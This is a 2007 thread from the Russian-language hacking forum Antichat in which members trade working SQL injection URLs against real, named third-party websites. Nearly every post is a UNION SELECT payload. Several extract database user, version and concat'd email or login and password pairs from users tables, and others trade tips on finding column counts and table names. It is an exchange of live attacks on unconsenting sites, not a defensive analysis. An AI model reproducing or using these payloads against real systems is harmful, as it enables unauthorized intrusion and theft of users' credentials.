HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.03.2007, 17:03
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами: 10669286

Репутация: 1942


По умолчанию

Цитата:
Сообщение от Micr0b  
нашол инэекцыю на
http://www.eightrent.co.jp/shop/?id=-18+ORDER+BY+7--
подобрал столбец, а когда делаю
http://www.eightrent.co.jp/shop/?id=-18+UNION+SELECT+1,2,3,4,5,6,7
ошыбка....(
уже говорил тебе - что когда применяеш order by ненужно ставить несуществующий id
 
Ответить с цитированием

  #2  
Старый 22.03.2007, 17:02
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами: 10669286

Репутация: 1942


По умолчанию

вавава

Цитата:
http://www.eppenga.com/folder.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #3  
Старый 22.03.2007, 17:13
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

www.know-house.ru

Код:
http://www.know-house.ru/card_firm.php?n_id=102'+union+select+1,2,user(),4,5,6,7+user/*
 
Ответить с цитированием

  #4  
Старый 22.03.2007, 17:15
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
С нами: 10137645

Репутация: 82
По умолчанию

немогу подобрать таблици =(

http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23/*
 
Ответить с цитированием

  #5  
Старый 22.03.2007, 17:24
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Код:
http://5mag.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,concat(email,char(58),pwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+limit+1,1/*
 
Ответить с цитированием

  #6  
Старый 22.03.2007, 17:32
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами: 10695206

Репутация: 245
По умолчанию

Snap >>
http://privet.zp.ua/part4.php3?catid=1'

мож здесь найдьош!)))
 
Ответить с цитированием

  #7  
Старый 22.03.2007, 17:39
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Цитата:
Сообщение от Micr0b  
Snap >>
http://privet.zp.ua/part4.php3?catid=1'

мож здесь найдьош!)))
думаешь, скрипты разные базы юзают? о_0
ps: automatization.ru
Код:
http://www.automatization.ru/equip-db/device.php?id=-1+union+select+1,2,3,4,5,concat(login,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+user+limit+0,1/*
 
Ответить с цитированием

  #8  
Старый 22.03.2007, 17:39
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

vechirka.kiev.ua

Код:
http://vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(user(),char(58),database(),char(58),version()),3,4+user/*
 
Ответить с цитированием

  #9  
Старый 22.03.2007, 17:50
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами: 10085717

Репутация: 590
По умолчанию

Код:
http://wc2006.sport.com.ua/teams.phtml?id_team=-6+union+select+concat(password,0x3a,username)+from+users/*
 
Ответить с цитированием

  #10  
Старый 22.03.2007, 17:51
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
С нами: 10137645

Репутация: 82
По умолчанию

База то одна только вот занвание таблиц подобрать не могу
http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23/*

Поэтому толку нет мне кажеться из других мест биться
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.